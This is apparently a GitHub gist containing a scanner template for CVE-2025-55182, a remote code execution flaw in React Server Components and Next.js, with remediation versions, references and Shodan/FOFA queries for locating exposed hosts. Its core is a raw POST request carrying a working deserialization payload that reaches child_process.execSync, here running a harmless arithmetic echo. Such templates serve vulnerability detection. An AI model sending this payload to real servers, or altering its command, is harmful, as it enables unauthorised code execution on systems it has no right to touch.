Created
December 9, 2025 06:03
-
-
Save spynika/20969263b0c40e1ac04287f74fa247fa to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2025-55182 | |
| info: | |
| name: React Server Components - Remote Code Execution (React2Shell) | |
| author: assetnote,slcyber | |
| severity: critical | |
| description: | | |
| React Server Components (RSC) in React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 contain an insecure deserialization | |
| vulnerability in the Flight protocol. An unauthenticated remote attacker can exploit this by sending a specially crafted | |
| multipart payload to execute arbitrary JavaScript code on the server. This affects Next.js applications using the App | |
| Router with Server Actions, as well as other frameworks implementing RSC (React Router, Waku, RedwoodJS, etc.). | |
| impact: | | |
| Successful exploitation allows unauthenticated remote code execution on the server, potentially leading to complete | |
| system compromise, data exfiltration, and lateral movement within the network. | |
| remediation: | | |
| Upgrade to patched versions immediately: | |
| - React: 19.0.1, 19.1.2, or 19.2.1 | |
| - Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, or 16.0.7 | |
| reference: | |
| - https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182 | |
| - https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/ | |
| - https://www.tenable.com/blog/react2shell-cve-2025-55182-react-server-components-rce | |
| - https://www.akamai.com/blog/security-research/cve-2025-55182-react-nextjs-server-functions-deserialization-rce | |
| - https://nvd.nist.gov/vuln/detail/CVE-2025-55182 | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | |
| cvss-score: 10.0 | |
| cve-id: CVE-2025-55182 | |
| cwe-id: CWE-502 | |
| metadata: | |
| verified: true | |
| max-request: 1 | |
| shodan-query: "X-Powered-By: Next.js" | |
| fofa-query: 'header="X-Powered-By: Next.js"' | |
| product: react | |
| vendor: facebook | |
| tags: cve,cve2025,react,nextjs,rce,deserialization,critical,kev | |
| http: | |
| - raw: | |
| - | | |
| POST / HTTP/1.1 | |
| Host: {{Hostname}} | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Next-Action: x | |
| X-Nextjs-Request-Id: b5dce965 | |
| X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9 | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="0" | |
| {"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: NEXT_REDIRECT;push;/login?a=${res};307;});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}} | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="1" | |
| "$@0" | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="2" | |
| [] | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad-- | |
| matchers-condition: and | |
| matchers: | |
| - type: regex | |
| part: header | |
| regex: | |
| - 'X-Action-Redirect:.*\/login\?a=11111' | |
| - type: status | |
| status: | |
| - 200 | |
| - 303 | |
| - 307 | |
| extractors: | |
| - type: kval | |
| kval: | |
| - x_action_redirect |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment